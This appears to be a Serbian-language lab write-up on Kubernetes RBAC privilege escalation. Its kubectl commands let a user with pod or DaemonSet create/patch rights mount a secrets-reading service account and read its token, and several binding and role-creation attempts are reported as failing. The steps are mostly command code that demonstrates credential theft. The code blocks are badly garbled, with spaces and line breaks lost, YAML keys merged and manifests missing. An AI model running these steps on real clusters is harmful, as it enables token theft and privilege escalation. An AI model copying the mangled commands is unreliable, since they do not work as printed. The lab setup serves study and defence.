Servisni nalog "test-sa" sa privilegijama klastera da čita tajne
Kreiraće se ClusterRole "test-cr" i ClusterRoleBinding "test-crb"
Dozvole za listanje i kreiranje podova biće date korisniku pod imenom "Test"
Kreiraće se Role "test-r" i RoleBinding "test-rb"
Zatim ćemo potvrditi da SA može da listira tajne i da korisnik Test može da listira podove
Na kraju ćemo imitirati korisnika Test da kreiramo pod koji uključuje SA test-sa i ukrademo token servisnog naloga.
Ovo je način da se pokaže kako bi korisnik mogao da eskalira privilegije na ovaj način
Za kreiranje scenarija koristi se administratorski nalog.
Pored toga, da bi se izvršila eksfiltracija sa tokena u ovom primeru koristi se administratorski nalog za exec unutar kreiranog poda. Međutim, kao što je ovde objašnjeno, deklaracija poda može sadržati eksfiltraciju tokena, tako da "exec" privilegija nije neophodna za eksfiltraciju tokena, "create" dozvola je dovoljna.
# Create Service Account test-sa# Create role and rolebinding to give list and create permissions over pods in default namespace to user Test# Create clusterrole and clusterrolebinding to give the SA test-sa access to secrets everywhereecho'apiVersion: v1kind: ServiceAccountmetadata:name: test-sa---kind: RoleapiVersion: test-rrules:- apiGroups: [""]resources: ["pods"]verbs: ["get", "list", "delete", "patch", "create"]---apiVersion: RoleBindingmetadata:name: test-rbsubjects:- kind: ServiceAccountname: test-sa- kind: Username: TestroleRef:kind: Rolename: test-rapiGroup: ClusterRoleapiVersion: test-crrules:- apiGroups: [""]resources: ["secrets"]verbs: ["get", "list", "delete", "patch", "create"]---apiVersion: ClusterRoleBindingmetadata:name: test-crbsubjects:- kind: ServiceAccountnamespace: defaultname: test-saapiGroup: ""roleRef:kind: ClusterRolename: test-crapiGroup:'|kubectlapply-f-# Check test-sa can access kube-system secretskubectl--assystem:serviceaccount:default:test-sa-nkube-systemgetsecrets# Check user User can get pods in namespace defaultkubectl--asTest-ndefaultgetpods# Create a pod as user Test with the SA test-sa (privesc step)echo"apiVersion: v1kind: Podmetadata:name: test-podnamespace: defaultspec:containers:- name: alpineimage: alpinecommand: ['/bin/sh']args: ['-c', 'sleep 100000']serviceAccountName: test-saautomountServiceAccountToken: truehostNetwork: true"|kubectl--asTestapply-f-# Connect to the pod created an confirm the attached SA token belongs to test-sakubectlexec-ti-ndefaulttest-pod--cat/var/run/secrets/|cut-d"."-f2|base64-d# Clean the scenariokubectldeletepodtest-podkubectldeleteclusterrolebindingtest-crbkubectldeleteclusterroletest-crkubectldeleterolebindingtest-rbkubectldeleteroletest-rkubectldeleteserviceaccounttest-sa
Kreirajte Daemonset
# Create Service Account test-sa# Create role and rolebinding to give list & create permissions over daemonsets in default namespace to user Test# Create clusterrole and clusterrolebinding to give the SA test-sa access to secrets everywhereecho'apiVersion: v1kind: ServiceAccountmetadata:name: test-sa---kind: RoleapiVersion: test-rrules:- apiGroups: ["apps"]resources: ["daemonsets"]verbs: ["get", "list", "create"]---apiVersion: RoleBindingmetadata:name: test-rbsubjects:- kind: Username: TestroleRef:kind: Rolename: test-rapiGroup: ClusterRoleapiVersion: test-crrules:- apiGroups: [""]resources: ["secrets"]verbs: ["get", "list", "delete", "patch", "create"]---apiVersion: ClusterRoleBindingmetadata:name: test-crbsubjects:- kind: ServiceAccountnamespace: defaultname: test-saapiGroup: ""roleRef:kind: ClusterRolename: test-crapiGroup:'|kubectlapply-f-# Check test-sa can access kube-system secretskubectl--assystem:serviceaccount:default:test-sa-nkube-systemgetsecrets# Check user User can get pods in namespace defaultkubectl--asTest-ndefaultgetdaemonsets# Create a daemonset as user Test with the SA test-sa (privesc step)echo"apiVersion: apps/v1kind: DaemonSetmetadata:name: alpinenamespace: defaultspec:selector:matchLabels:name: alpinetemplate:metadata:labels:name: alpinespec:serviceAccountName: test-saautomountServiceAccountToken: truehostNetwork: truecontainers:- name: alpineimage: alpinecommand: ['/bin/sh']args: ['-c', 'sleep 100000']"|kubectl--asTestapply-f-# Connect to the pod created an confirm the attached SA token belongs to test-sakubectlexec-ti-ndefaultdaemonset.apps/alpine--cat/var/run/secrets/|cut-d"."-f2|base64-d# Clean the scenariokubectldeletedaemonsetalpinekubectldeleteclusterrolebindingtest-crbkubectldeleteclusterroletest-crkubectldeleterolebindingtest-rbkubectldeleteroletest-rkubectldeleteserviceaccounttest-sa
Patch Daemonset
U ovom slučaju ćemo patch-ovati daemonset da učitamo naš željeni servisni nalog.
Ako vaš korisnik ima glagol update umesto patch, ovo neće raditi.
# Create Service Account test-sa# Create role and rolebinding to give list & update patch permissions over daemonsets in default namespace to user Test# Create clusterrole and clusterrolebinding to give the SA test-sa access to secrets everywhereecho'apiVersion: v1kind: ServiceAccountmetadata:name: test-sa---kind: RoleapiVersion: test-rrules:- apiGroups: ["apps"]resources: ["daemonsets"]verbs: ["get", "list", "patch"]---apiVersion: RoleBindingmetadata:name: test-rbsubjects:- kind: Username: TestroleRef:kind: Rolename: test-rapiGroup: ClusterRoleapiVersion: test-crrules:- apiGroups: [""]resources: ["secrets"]verbs: ["get", "list", "delete", "patch", "create"]---apiVersion: ClusterRoleBindingmetadata:name: test-crbsubjects:- kind: ServiceAccountnamespace: defaultname: test-saapiGroup: ""roleRef:kind: ClusterRolename: test-crapiGroup: apps/v1kind: DaemonSetmetadata:name: alpinenamespace: defaultspec:selector:matchLabels:name: alpinetemplate:metadata:labels:name: alpinespec:automountServiceAccountToken: falsehostNetwork: truecontainers:- name: alpineimage: alpinecommand: ['/bin/sh']args: ['-c', 'sleep100']'|kubectlapply-f-# Check user User can get pods in namespace defaultkubectl--asTest-ndefaultgetdaemonsets# Create a daemonset as user Test with the SA test-sa (privesc step)echo"apiVersion: apps/v1kind: DaemonSetmetadata:name: alpinenamespace: defaultspec:selector:matchLabels:name: alpinetemplate:metadata:labels:name: alpinespec:serviceAccountName: test-saautomountServiceAccountToken: truehostNetwork: truecontainers:- name: alpineimage: alpinecommand: ['/bin/sh']args: ['-c', 'sleep 100000']"|kubectl--asTestapply-f-# Connect to the pod created an confirm the attached SA token belongs to test-sakubectlexec-ti-ndefaultdaemonset.apps/alpine--cat/var/run/secrets/|cut-d"."-f2|base64-d# Clean the scenariokubectldeletedaemonsetalpinekubectldeleteclusterrolebindingtest-crbkubectldeleteclusterroletest-crkubectldeleterolebindingtest-rbkubectldeleteroletest-rkubectldeleteserviceaccounttest-sa
Ne radi
Kreiraj/Izmeni Bindings
Ne radi:
Kreiraj novi RoleBinding samo sa glagolom create
Kreiraj novi RoleBinding samo sa glagolom patch (morate imati dozvole za povezivanje)
Ne možete to učiniti da dodelite ulogu sebi ili drugom SA
Izmeni novi RoleBinding samo sa glagolom patch (morate imati dozvole za povezivanje)
Ne možete to učiniti da dodelite ulogu sebi ili drugom SA
echo'apiVersion: v1kind: ServiceAccountmetadata:name: test-sa---apiVersion: v1kind: ServiceAccountmetadata:name: test-sa2---kind: RoleapiVersion: test-rrules:- apiGroups: [""]resources: ["rolebindings"]verbs: ["get", "patch"]---apiVersion: RoleBindingmetadata:name: test-rbsubjects:- kind: Username: TestroleRef:kind: Rolename: test-rapiGroup: RoleapiVersion: test-r2rules:- apiGroups: [""]resources: ["pods"]verbs: ["get", "list", "delete", "patch", "create"]---apiVersion: RoleBindingmetadata:name: test-rb2subjects:- kind: ServiceAccountname: test-saapiGroup: ""roleRef:kind: Rolename: test-r2apiGroup:'|kubectlapply-f-# Create a pod as user Test with the SA test-sa (privesc step)echo"apiVersion: RoleBindingmetadata:name: test-r2subjects:- kind: ServiceAccountname: test-sa2apiGroup: ""roleRef:kind: Rolename: test-r2apiGroup:"|kubectl--asTestapply-f-# Connect to the pod created an confirm the attached SA token belongs to test-sakubectlexec-ti-ndefaulttest-pod--cat/var/run/secrets/|cut-d"."-f2|base64-d# Clean the scenariokubectldeleterolebindingtest-rbkubectldeleterolebindingtest-rb2kubectldeleteroletest-rkubectldeleteroletest-r2kubectldeleteserviceaccounttest-sakubectldeleteserviceaccounttest-sa2
Bind explicitly Bindings
U sekciji "Prevencija eskalacije privilegija i bootstrapping" na se pominje da ako SA može da kreira Binding i ima eksplicitne Bind dozvole nad Role/Cluster role, može da kreira bindove čak i koristeći Roles/ClusterRoles sa dozvolama koje nema.
Međutim, to nije radilo za mene:
# Create 2 SAs, give one of them permissions to create clusterrolebindings# and bind permissions over the ClusterRole "admin"echo ' apiGroups: [""]resources: ["clusterrolebindings"]verbs: ["get","create"]- apiGroups: [""]resources: ["clusterroles"]verbs: ["bind"]resourceNames: ["admin"]' | kubectl apply -f -# Try to bind the ClusterRole "admin" with the second SA (won't work)echo '' | kubectl --as system:serviceaccount:default:test-sa apply -f -# Clean environmentkubectl delete clusterrolebindings test-crbkubectl delete clusterrolebindings test-crb2kubectl delete clusterrole test-crkubectl delete serviceaccount test-sakubectl delete serviceaccount test-sa
# Like the previous example, but in this case we try to use RoleBindings# instead of CLusterRoleBindingsecho ' apiGroups: [""]resources: ["clusterrolebindings"]verbs: ["get","create"]- apiGroups: [""]resources: ["rolebindings"]verbs: ["get","create"]- apiGroups: [""]resources: ["clusterroles"]verbs: ["bind"]resourceNames: ["admin","edit","view"]' | kubectl apply -f -# Won't workecho '' | kubectl --as system:serviceaccount:default:test-sa apply -f -# Clean environmentkubectl delete rolebindings test-rbkubectl delete rolebindings test-rb2kubectl delete clusterrole test-crkubectl delete serviceaccount test-sakubectl delete serviceaccount test-sa2
Kreiranje proizvoljnih uloga
U ovom primeru pokušavamo da kreiramo ulogu koja ima dozvole za kreiranje i putanju preko resursa uloga. Međutim, K8s nam onemogućava da kreiramo ulogu sa više dozvola nego što ih glavni korisnik koji kreira ima:
# Create a SA and give the permissions "create" and "patch" over "roles"echo ' apiGroups: [""]resources: ["roles"]verbs: ["patch","create","get"]' | kubectl apply -f -# Try to create a role over all the resources with "create" and "patch"# This won't wotrkecho ' apiGroups: [""]resources: ["*"]verbs: ["patch","create"]' | kubectl --as system:serviceaccount:default:test-sa apply -f-# Clean the environmentkubectl delete rolebinding test-rbkubectl delete role test-rkubectl delete role test-r2kubectl delete serviceaccount test-sa